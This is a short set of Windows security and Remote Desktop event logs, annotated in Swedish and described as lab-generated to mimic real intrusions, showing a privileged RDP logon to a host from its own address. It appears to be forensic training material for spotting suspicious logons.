Samtliga loggar är skapade i våran labbmiljö men efterliknar så långt som möjligt de verkliga dataintrången.
Log Name: Security
Source: Microsoft-Windows-Security-Auditing
Date: 2017-09-13 12:50:10
Event ID: 4624 <--
Task Category: Logon <--
Level: Information
Keywords: Audit Success
User: N/A
Computer: pongo.hominidae.org
Description:
An account was successfully logged on.
Subject:
Security ID: SYSTEM
Account Name: PONGO$ <-- Datorkonto
Account Domain: HOMINIDAE
Logon ID: 0x3E7
Logon Information:
Logon Type: 10 <--- RDP
Restricted Admin Mode: No
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: HOMINIDAE\apan.apansson
Account Name: apan.apansson <-- konto som används
Account Domain: HOMINIDAE
Logon ID: 0x2946DE
Linked Logon ID: 0x294711
Network Account Name: -
Network Account Domain: -
Logon GUID: {f784b907-a9f4-df59-7b04-71c16fca0a47}
Process Information:
Process ID: 0x360
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: PONGO
Source Network Address: 172.30.1.85
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
Log Name: Security
Source: Microsoft-Windows-Security-Auditing
Date: 2017-09-13 12:50:10
Event ID: 4672 <--
Task Category: Special Logon
Level: Information
Keywords: Audit Success
User: N/A
Computer: pongo.hominidae.org
Description:
Special privileges assigned to new logon. <-- Priviligierat konto
Subject:
Security ID: HOMINIDAE\apan.apansson
Account Name: apan.apansson
Account Domain: HOMINIDAE
Logon ID: 0x2946DE
Privileges: SeSecurityPrivilege <-- Priviligierat konto / Admin
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeImpersonatePrivilege
Log Name: Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
Source: Microsoft-Windows-TerminalServices-LocalSessionManager
Date: 2017-09-13 12:50:11
Event ID: 25
Task Category: None
Level: Information
Keywords:
User: SYSTEM
Computer: pongo.hominidae.org
Description:
Remote Desktop Services: Session reconnection succeeded:
User: HOMINIDAE\apan.apansson
Session ID: 1
Source Network Address: 172.30.1.85 <-- RDP till sig själv
Log Name: Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin
Source: Microsoft-Windows-TerminalServices-RemoteConnectionManager
Date: 2017-09-13 12:49:37
Event ID: 1158
Task Category: None
Level: Information
Keywords:
User: NETWORK SERVICE
Computer: pongo.hominidae.org
Description:
Remote Desktop Services accepted a connection from IP address 172.30.1.85. <-- RDP till sig själv
Log Name: Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational
Source: Microsoft-Windows-RemoteDesktopServices-RdpCoreTS
Date: 2017-09-13 12:49:07
Event ID: 131
Task Category: RemoteFX module
Level: Information
Keywords:
User: NETWORK SERVICE
Computer: pongo.hominidae.org
Description:
The server accepted a new TCP connection from client 172.30.1.85:52737. <-- RDP till sig själv